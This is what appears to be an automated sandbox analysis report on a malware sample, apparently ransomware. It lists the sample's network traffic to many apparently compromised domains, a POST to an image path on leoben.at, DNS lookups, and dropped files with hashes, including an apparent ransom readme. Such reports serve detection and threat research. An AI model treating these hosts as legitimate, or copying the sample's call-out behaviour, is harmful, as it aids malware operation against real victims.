      5
      5
    • 46.8.8.100:443
      atmos-show.com
      tls
      LisectAVT_2403002C_119.exe
      1.4kB
      3.5kB
      16
      12
    • 2.18.190.80:80
      http://apps.identrust.com/roots/dstrootcax3.p7c
      http
      LisectAVT_2403002C_119.exe
      375 B
      1.6kB
      5
      5

      HTTP Request

      GET http://apps.identrust.com/roots/dstrootcax3.p7c

      HTTP Response

      200
    • 209.58.148.145:443
      hokagestore.com
      tls
      LisectAVT_2403002C_119.exe
      349 B
      219 B
      5
      5
    • 209.58.148.145:443
      hokagestore.com
      tls
      LisectAVT_2403002C_119.exe
      288 B
      219 B
      5
      5
    • 3.33.251.168:443
      midmohandyman.com
      tls
      LisectAVT_2403002C_119.exe
      397 B
      259 B
      6
      6
    • 3.33.251.168:443
      midmohandyman.com
      tls
      LisectAVT_2403002C_119.exe
      334 B
      259 B
      6
      6
    • 209.17.116.163:443
      stingraybeach.com
      tls
      LisectAVT_2403002C_119.exe
      403 B
      172 B
      6
      4
    • 209.17.116.163:443
      stingraybeach.com
      tls
      LisectAVT_2403002C_119.exe
      340 B
      172 B
      6
      4
    • 185.78.250.157:443
      tandartspraktijkhartjegroningen.nl
      tls
      LisectAVT_2403002C_119.exe
      924 B
      5.8kB
      10
      12
    • 94.247.147.150:443
      https://leoben.at/include/image/nqrumsgk.jpg
      tls, http
      LisectAVT_2403002C_119.exe
      2.3kB
      8.0kB
      13
      16

      HTTP Request

      POST https://leoben.at/include/image/nqrumsgk.jpg

      HTTP Response

      200
    • 185.66.41.198:443
      licor43.de
      LisectAVT_2403002C_119.exe
      104 B
      2
    • 8.8.8.8:53
      ddos.dnsnb8.net
      dns
      Kufmxd.exe
      61 B
      77 B
      1
      1

      DNS Request

      ddos.dnsnb8.net

      DNS Response

      44.221.84.105

    • 8.8.8.8:53
      sandd.nl
      dns
      LisectAVT_2403002C_119.exe
      54 B
      86 B
      1
      1

      DNS Request

      sandd.nl

      DNS Response

      2.17.209.149
      2.17.209.133

    • 8.8.8.8:53
      digivod.de
      dns
      LisectAVT_2403002C_119.exe
      56 B
      72 B
      1
      1

      DNS Request

      digivod.de

      DNS Response

      159.69.118.212

    • 8.8.8.8:53
      southeasternacademyofprosthodontics.org
      dns
      LisectAVT_2403002C_119.exe
      85 B
      167 B
      1
      1

      DNS Request

      southeasternacademyofprosthodontics.org

    • 8.8.8.8:53
      resortmtn.com
      dns
      LisectAVT_2403002C_119.exe
      59 B
      91 B
      1
      1

      DNS Request

      resortmtn.com

      DNS Response

      15.197.142.173
      3.33.152.147

    • 8.8.8.8:53
      mdk-mediadesign.de
      dns
      LisectAVT_2403002C_119.exe
      64 B
      80 B
      1
      1

      DNS Request

      mdk-mediadesign.de

      DNS Response

      5.175.14.247

    • 8.8.8.8:53
      tetinfo.in
      dns
      LisectAVT_2403002C_119.exe
      56 B
      88 B
      1
      1

      DNS Request

      tetinfo.in

      DNS Response

      104.21.45.69
      172.67.211.14

    • 8.8.8.8:53
      www.tetinfo.in
      dns
      LisectAVT_2403002C_119.exe
      60 B
      92 B
      1
      1

      DNS Request

      www.tetinfo.in

      DNS Response

      172.67.211.14
      104.21.45.69

    • 8.8.8.8:53
      fayrecreations.com
      dns
      LisectAVT_2403002C_119.exe
      64 B
      80 B
      1
      1

      DNS Request

      fayrecreations.com

      DNS Response

      198.54.121.233

    • 8.8.8.8:53
      ecpmedia.vn
      dns
      LisectAVT_2403002C_119.exe
      57 B
      73 B
      1
      1

      DNS Request

      ecpmedia.vn

      DNS Response

      103.221.223.112

    • 8.8.8.8:53
      physiofischer.de
      dns
      LisectAVT_2403002C_119.exe
      62 B
      78 B
      1
      1

      DNS Request

      physiofischer.de

      DNS Response

      178.254.32.102

    • 8.8.8.8:53
      highlinesouthasc.com
      dns
      LisectAVT_2403002C_119.exe
      66 B
      98 B
      1
      1

      DNS Request

      highlinesouthasc.com

      DNS Response

      172.67.162.61
      104.21.81.149

    • 8.8.8.8:53
      antenanavi.com
      dns
      LisectAVT_2403002C_119.exe
      60 B
      133 B
      1
      1

      DNS Request

      antenanavi.com

    • 8.8.8.8:53
      blog.solutionsarchitect.guru
      dns
      LisectAVT_2403002C_119.exe
      74 B
      142 B
      1
      1

      DNS Request

      blog.solutionsarchitect.guru

    • 8.8.8.8:53
      deepsouthclothingcompany.com
      dns
      LisectAVT_2403002C_119.exe
      148 B
      147 B
      2
      1

      DNS Request

      deepsouthclothingcompany.com

      DNS Request

      deepsouthclothingcompany.com

    • 8.8.8.8:53
      coursio.com
      dns
      LisectAVT_2403002C_119.exe
      57 B
      73 B
      1
      1

      DNS Request

      coursio.com

      DNS Response

      64.227.72.13

    • 8.8.8.8:53
      quickyfunds.com
      dns
      LisectAVT_2403002C_119.exe
      61 B
      134 B
      1
      1

      DNS Request

      quickyfunds.com

    • 8.8.8.8:53
      atmos-show.com
      dns
      LisectAVT_2403002C_119.exe
      60 B
      76 B
      1
      1

      DNS Request

      atmos-show.com

      DNS Response

      46.8.8.100

    • 8.8.8.8:53
      apps.identrust.com
      dns
      LisectAVT_2403002C_119.exe
      64 B
      165 B
      1
      1

      DNS Request

      apps.identrust.com

      DNS Response

      2.18.190.80
      2.18.190.81

    • 8.8.8.8:53
      pawsuppetlovers.com
      dns
      LisectAVT_2403002C_119.exe
      65 B
      65 B
      1
      1

      DNS Request

      pawsuppetlovers.com

    • 8.8.8.8:53
      hokagestore.com
      dns
      LisectAVT_2403002C_119.exe
      61 B
      77 B
      1
      1

      DNS Request

      hokagestore.com

      DNS Response

      209.58.148.145

    • 8.8.8.8:53
      midmohandyman.com
      dns
      LisectAVT_2403002C_119.exe
      63 B
      95 B
      1
      1

      DNS Request

      midmohandyman.com

      DNS Response

      3.33.251.168
      15.197.225.128

    • 8.8.8.8:53
      mmgdouai.fr
      dns
      LisectAVT_2403002C_119.exe
      57 B
      115 B
      1
      1

      DNS Request

      mmgdouai.fr

    • 8.8.8.8:53
      stingraybeach.com
      dns
      LisectAVT_2403002C_119.exe
      63 B
      79 B
      1
      1

      DNS Request

      stingraybeach.com

      DNS Response

      209.17.116.163

    • 8.8.8.8:53
      tandartspraktijkhartjegroningen.nl
      dns
      LisectAVT_2403002C_119.exe
      80 B
      96 B
      1
      1

      DNS Request

      tandartspraktijkhartjegroningen.nl

      DNS Response

      185.78.250.157

    • 8.8.8.8:53
      leoben.at
      dns
      LisectAVT_2403002C_119.exe
      55 B
      71 B
      1
      1

      DNS Request

      leoben.at

      DNS Response

      94.247.147.150

    • 8.8.8.8:53
      licor43.de
      dns
      LisectAVT_2403002C_119.exe
      56 B
      72 B
      1
      1

      DNS Request

      licor43.de

      DNS Response

      185.66.41.198

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\57b425897y-readme.txt

      Filesize

      6KB

      MD5

      2159f137e27043ed24b5e5faee35522c

      SHA1

      6246f350dd1218f8976558382a8113b32ceb1278

      SHA256

      9bd37863b318eff18965cce554fd5e704ae34e12267734eabe0c2db3bbcaf968

      SHA512

      477e7a4481077f21847489af9f38e024ba90a953affdd7e08c59f566cae5e9acce9c59c6262353c0f5cb9c20b2721c0caf3ee5644c9e41eee7da181479ec0749

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      342B

      MD5

      5171735dcb588b4b4a7bd2085ab821fa

      SHA1

      d95d01e96c4e3d0dd8f69ee31c4e9195c8ab672f

      SHA256

      a531b1c96be17e12da17fd528ec9211f0ccae7f9f12ca738281e93aa4b25c95a

      SHA512

      35a0ed69623d28735f5de3f3e90a92c1573f98f14ac476ccb58bd7a039395002fc3ba4e32757a642561a32f7886194320aa9357627072e0edd4b3812eabb25c1

    • C:\Users\Admin\AppData\Local\Temp\21b416d7.bat

      Filesize

      187B

      MD5

      ca7c939063c8fb20b5f15a869f2167d7

      SHA1

      84c7af8543ae58a8747a28b43531676225a20967

      SHA256

      39c959310fd3cffddcaaaa97411a153e6162ce94078838f681140d477d2575b1

      SHA512

      bb07cd1ef82bf1ba45842af42373b2e91106297cf9bc2deae192076970073020ecc59886656e374b2e82698c4dc31f65b38e5c67722a367bec91210f6f6f2095

    • C:\Users\Admin\AppData\Local\Temp\4FB84766.exe

      Filesize

      4B

      MD5

      20879c987e2f9a916e578386d499f629

      SHA1

      c7b33ddcc42361fdb847036fc07e880b81935d5d

      SHA256

      9f2981a7cc4d40a2a409dc895de64253acd819d7c0011c8e80b86fe899464e31

      SHA512

      bcdde1625364dd6dd143b45bdcec8d59cf8982aff33790d390b839f3869e0e815684568b14b555a596d616252aeeaa98dac2e6e551c9095ea11a575ff25ff84f

    • C:\Users\Admin\AppData\Local\Temp\Cab1650.tmp

      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    • C:\Users\Admin\AppData\Local\Temp\Tar1692.tmp

      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    • C:\Windows\System32\catroot2\dberr.txt

      Filesize

      191KB

      MD5

      66d654a4711c0506f5c6722460f0fc84

      SHA1

      0bb94740a18955997970b4d9ea3adcba71fa048a

      SHA256

      0113ba9a0d2354dbe0151ff798d2d42cc749643a505f5c11ee484f225715d492

      SHA512

      e5ce901cbe2fbfae8aaabd82c3c93728bdbab05adb5219cfcdffd01a342eac83aa9ac25e3ae85fefaa7704fa41857c438847e1bed593abc8d52fcec81d9dd21c

    • \Users\Admin\AppData\Local\Temp\Kufmxd.exe

      Filesize

      15KB

      MD5

      f7d21de5c4e81341eccd280c11ddcc9a

      SHA1

      d4e9ef10d7685d491583c6fa93ae5d9105d815bd

      SHA256

      4485df22c627fa0bb899d79aa6ff29bc5be1dbc3caa2b7a490809338d54b7794

      SHA512

      e4553b86b083996038bacfb979ad0b86f578f95185d8efac34a77f6cc73e491d4f70e1449bbc9eb1d62f430800c1574101b270e1cb0eeed43a83049a79b636a3

    • memory/1952-62-0x0000000000260000-0x0000000000269000-memory.dmp

      Filesize

      36KB

    • memory/1952-11-0x0000000000260000-0x0000000000269000-memory.dmp

      Filesize

      36KB

    • memory/2240-589-0x0000000000020000-0x0000000000029000-memory.dmp

      Filesize

      36KB

    • memory/2240-10-0x0000000000020000-0x0000000000029000-memory.dmp

      Filesize

      36KB

    • memory/2240-9-0x0000000000020000-0x0000000000029000-memory.dmp

      Filesize

      36KB

    • memory/2240-8-0x0000000000030000-0x0000000000057000-memory.dmp

      Filesize

      156KB

    • memory/2240-66-0x0000000000030000-0x0000000000057000-memory.dmp

      Filesize

      156KB

    • memory/2240-590-0x0000000000020000-0x0000000000029000-memory.dmp

      Filesize

      36KB

    • memory/2660-63-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

      Filesize

      9.6MB

    • memory/2660-49-0x000007FEF508E000-0x000007FEF508F000-memory.dmp

      Filesize

      4KB

    • memory/2660-67-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

      Filesize

      9.6MB

    • memory/2660-65-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

      Filesize

      9.6MB

    • memory/2660-53-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

      Filesize

      9.6MB

    • memory/2660-50-0x000000001B360000-0x000000001B642000-memory.dmp

      Filesize

      2.9MB

    • memory/2660-51-0x0000000002490000-0x0000000002498000-memory.dmp

      Filesize

      32KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.